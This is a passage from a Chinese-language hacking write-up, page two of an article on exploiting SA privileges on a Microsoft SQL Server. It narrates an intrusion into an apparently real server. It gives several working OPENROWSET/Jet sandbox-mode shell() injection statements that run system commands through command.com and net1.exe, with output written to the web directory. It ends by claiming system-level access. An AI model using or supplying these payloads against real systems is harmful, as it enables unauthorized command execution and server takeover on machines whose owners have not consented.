整理下思路后我又想到了沙盒模式,因为啥盒模式调用的CMD不一定是系统自带的,我们可以自己传一个上去的,想到这里在WEB目录下传了个CMD.EXE然后在海洋里执行如下语句
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("d:\zjkdj\zjkdj\zjkds\cmd.exe /c net start>D:\zjkdj\zjkdj\zjkds\1.txt")')--
立刻到站点目录下找 1.txt,但是没有发现,看来只能调用系统自带的程序了,无聊的在SYSTEM32下乱逛,突然发现了command.com这个程序,哈哈,总算看到希望了!这是什么?我来告诉你吧,它也是系统自带的执行系统命令的程序,和CMD.EXE的功能几乎没有区别,但是大小却比CMD.EXE小几十倍,既然不让调用外部程序那我就调用内部程序,马上就在海洋里修改好如下语句执行
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net start>D:\zjkdj\zjkdj\zjkds\1.txt")')--
调用command.com执行系统命令,执行完成后在站点目录下总算找到了1.txt
哈哈,总算看到希望了,打开1.txt看看服务器开了什么服务,但是我却看到一片空白,这是什么原因?难道?还是确定一下比较好,立刻转到 SYSTEM32下查看文件,令我吃惊的是居然没有看到NET.EXE,怪不得一片空白呢,系统根本没有net.exe这个程序,自然是什么也看不到,郁闷,管理员不是一般的变态啊!
不过没有关系,windows系统中还有一个叫net1.exe的程序功能是和net.exe一样的哦,我们来调用它执行系统命令,语句如下
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("command.com /c net1 start>D:\zjkdj\zjkdj\zjkds\1.txt")')--
执行完毕后再看1.txt的内容如下
哈哈,成功了,
入侵到了这里也就没有什么继续的必要了,因为我们已经有了系统权限,想做什么都随自己愿意了,收拾收拾在管理员的桌面上写个提醒.txt告诉他漏洞所在,让他尽快修补吧!
最后总结一下,在先前以为是系统的存储过程删掉了,但是后来随着入侵的深入才发现过程并没有删,只是每个存储过程都必须调用cmd.exe所以不能执行系统命令也是肯定的了,所以大家在
入侵的时候一定要细心的分析整个过程,从中找出对自己有用的东西。
上一页 [1] [2]
[图文]SA权限下的思路变通
您现在的位置: